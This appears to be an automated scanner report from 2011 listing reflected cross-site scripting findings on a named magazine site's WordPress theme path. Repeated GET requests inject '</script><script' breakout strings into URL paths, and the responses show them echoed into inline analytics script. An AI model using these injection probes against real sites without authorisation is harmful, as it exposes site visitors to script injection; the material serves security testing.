HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:33:05 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30488 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:33:08 GMT Date: Sat, 17 Sep 2011 16:33:08 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... 2 = ''; //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content11f59</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themesad4f6</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:34:44 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30488 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:34:47 GMT Date: Sat, 17 Sep 2011 16:34:47 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themesad4f6</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /*** ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesisaef11</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:36:21 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30488 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:36:26 GMT Date: Sat, 17 Sep 2011 16:36:26 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... rop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /********** ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesis Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:37:54 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30488 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:37:58 GMT Date: Sat, 17 Sep 2011 16:37:58 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesis Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:39:11 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30488 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:39:13 GMT Date: Sat, 17 Sep 2011 16:39:13 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... 3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO NOT ALTER A ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content3eb1b</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934 |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:40:07 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30483 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:40:07 GMT Date: Sat, 17 Sep 2011 16:40:07 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... 2 = ''; //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content3eb1b</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /* ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes94aae</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934 |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:40:29 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30483 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:40:30 GMT Date: Sat, 17 Sep 2011 16:40:30 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes94aae</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /******** ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesiscd0f1</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934 |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:40:47 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30483 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:40:47 GMT Date: Sat, 17 Sep 2011 16:40:47 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... rop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* D ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesis Host: ellegirl.elle.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934 |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:41:03 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30483 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:41:04 GMT Date: Sat, 17 Sep 2011 16:41:04 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO NOT A ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesis Host: ellegirl.elle.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934 |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:41:21 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30483 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:41:21 GMT Date: Sat, 17 Sep 2011 16:41:21 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO NOT ALTER AN ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesis Host: ellegirl.elle.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934 |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:41:37 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30483 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:41:38 GMT Date: Sat, 17 Sep 2011 16:41:38 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... ment.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO NOT ALTER ANYTHING BELOW ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content320a6</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:33:19 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30485 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:33:23 GMT Date: Sat, 17 Sep 2011 16:33:23 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... 2 = ''; //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content320a6</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes38315</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:34:54 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30485 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:34:58 GMT Date: Sat, 17 Sep 2011 16:34:58 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes38315</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /****** ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesisc00e9</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:36:26 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30485 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:36:30 GMT Date: Sat, 17 Sep 2011 16:36:30 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... rop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesis Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:37:57 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30485 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:38:01 GMT Date: Sat, 17 Sep 2011 16:38:01 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO NOT ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesis Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:39:12 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30485 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:39:15 GMT Date: Sat, 17 Sep 2011 16:39:15 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO NOT AL ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesis Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:40:05 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30484 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:40:06 GMT Date: Sat, 17 Sep 2011 16:40:06 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO NOT ALTER ANYTHI ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content4ddd6</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:33:15 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30499 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:33:19 GMT Date: Sat, 17 Sep 2011 16:33:19 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... 2 = ''; //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content4ddd6</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.loca ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themesf8d6c</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
